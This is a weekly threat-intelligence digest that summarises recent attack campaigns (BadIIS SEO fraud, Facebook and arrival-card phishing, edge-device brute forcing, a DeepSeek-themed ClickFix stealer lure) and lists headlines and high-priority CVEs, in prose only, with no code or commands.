Chinese-speaking threat actor manipulates SEO with BadIIS
In 2024, Trend Micro researchers observed the mass distribution of BadIIS in Asia as part of a search engine optimisation (SEO) fraud campaign targeting Internet Information Services (IIS). The most impacted countries include India, Thailand, and Vietnam, among others. Targeted IIS servers include government, universities, technology companies, and telecommunications sector-owned machines. The observed campaign involves threat actors exploiting vulnerable IIS servers to install BadIIS malware on the compromised servers. BadIIS can alter the HTTP response header information requested from the web server by injecting JavaScript code to redirect visitors to malicious sites. Most of the observed variants redirect users to illegal gambling websites, though the researchers warned that the same method could be adapted to redirect users to malicious servers that host malware or phishing schemes.
Facebook phishing campaign uses copyright infringement to harvest information
Check Point researchers identified a phishing campaign leveraging Facebook to harvest credentials. The campaign began in December 2024 and has since been distributed to more than 12,279 email addresses across hundreds of companies in Europe, the United States, and Australia. Versions of the notifications were also found in Chinese and Arabic. The actors leverage Salesforce’s automated mailing service, without changing the sender ID, to distribute emails from the Salesforce ‘noreply’ email address. The emails use fake versions of the Facebook logo and claim the recipient has violated copyright laws. A link leads to a fake Facebook support page where victims are prompted to enter their credentials.
Large-scale brute force attack campaign targets edge security devices
The Shadowserver Foundation warned of a large-scale brute force attack using around 2.8 million IP addresses that has been active since at least January 2025. The campaign is targeting credentials for a wide range of networking devices, including ones from Palo Alto Networks, Ivanti, and SonicWall. The majority of IP addresses, 1.1 million, are from Brazil, with a large amount also coming from Turkey, Russia, Argentina, Morrocco, and Mexico. The attacking IP addresses are spread across many networks and Autonomous Systems, and are likely part of a botnet or an operation associated with residential proxy networks. The attacks are mainly conducted by MikroTik, Huawei, Cisco, Boa, and ZTE routers and Internet of Things devices.
DeepSeek ClickFix campaign delivers Vidar and Lumma Stealer
CloudSEK researchers observed threat actors exploiting DeepSeek’s brand name to launch phishing campaigns that deliver infostealer malware like Vidar Stealer and Lumma Stealer. The campaigns involve investment scheme lures and leverage the ClickFix technique. One such campaign involves a fake DeepSeek site for a supposed partnership programme. Clicking on the ‘Verificate’ button opens a fake CAPTCHA prompt that copies a malicious PowerShell command, which the user is asked to paste into the Run command dialog box. The fake domain used in the campaign was hosted behind Cloudflare to evade detection from artificial intelligence-based search engines.
Phishing campaign targets travelers with arrival card lure to steal data
Cofense researchers detailed an ongoing phishing campaign that has been targeting travelers to Singapore since at least September 2023. The campaign is highly targeted and has since expanded to also target travelers to Malaysia and the UK. The campaign involves phishing emails claiming more information is required as part of an immigration arrival card application. The emails redirect to a phishing page impersonating Singapore’s official Immigration & Checkpoint Authority website. Users are then asked to provide sensitive information, such as credit card details, to pay for a supposed processing fee. Parts of the fake portal are auto-filled with personally identifiable information to make it appear more legitimate.
Ransomware
Volume of blog posts by operators during the last week.
China-Linked Espionage Tools Used in Ransomware AttacksSymantec Enterprise Blogs – Feb 13 2025XELERA Ransomware Campaign: Fake Food Corporation of India Job Offers Targeting Tech AspirantsSeqrite Blog – Feb 12 2025Babuk Impersonators Leverage a Brand Name & Previously Stolen Data to Engage in Re-ExtortionsAnalyst1 – Feb 11 2025United States, Australia, and the United Kingdom Jointly Sanction Key Infrastructure that Enables Ransomware AttacksUS Department of the Treasury – Press Releases – Feb 11 2025Police arrests 2 Phobos ransomware suspects, seizes 8Base sitesBleeping Computer – Feb 10 2025Abyss Locker Ransomware Attacking Critical Network Devices including ESXi serversGBHackers On Security – Feb 06 2025
Financial Services
New Phishing Campaign Abuses Webflow, SEO, and Fake CAPTCHAsNetskope – Threat Labs – Feb 12 2025FinStealer Malware Targets Leading Indian Bank’s Mobile Users, Stealing Login CredentialsGBHackers On Security – Feb 11 2025Hacker targets Indonesian banks with ransomware threatsBne IntelliNews – Feb 10 2025Fraudulent X Token and Phishing Websites in Crypto Scam Offering a Trip to MarsTechNadu – Feb 08 2025Google Tag Manager Skimmer Steals Credit Card Info From Magento SiteSucuri Blog – Feb 06 2025
Geopolitics
The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operationMicrosoft Security Blog – Feb 12 2025From South America to Southeast Asia: The Fragile Web of REF7707Elastic Security Labs – Feb 12 2025Sandworm APT Exploits Trojanized KMS Tools to Target Ukrainian Users in Cyber Espionage CampaignSecurityonline.info – Feb 12 2025Handala Hackers Claim Massive Data Breach on Israeli Police, Leak 350,000 FilesHackRead – Feb 10 2025Owner of spyware used in alleged WhatsApp breach ends contract with ItalyThe Guardian – Australia – Feb 06 2025
High Priority Vulnerabilities
Name | name | Software | Base Score |
Temp Score |
---|---|---|---|---|
CVE-2025-24200 | iPadOS | 4.6 | 3.8 | |
Related: Apple fixes zero-day exploited in ‘extremely sophisticated’ attacks | ||||
CVE-2025-21418 | Windows | 7.8 | 7.5 | |
Related: Microsoft February 2025 Patch Tuesday fixes 4 zero-days, 55 flaws | ||||
CVE-2025-0994 | Cityworks | 8.8 | 6.9 | |
Related: CISA Warns of Active Exploitation in Trimble Cityworks Vulnerability Leading to IIS RCE | ||||
CVE-2023-49103 | graphapi | 10.0 | 5.1 | |
Related: ThinkPHP and ownCloud flaws actively exploited | ||||
CVE-2025-0282 | Neurons for ZTA gateways | 9.0 | 7.7 | |
Related: Hackers Exploiting Ivanti Connect Secure RCE Vulnerability to Install SPAWNCHIMERA Malware |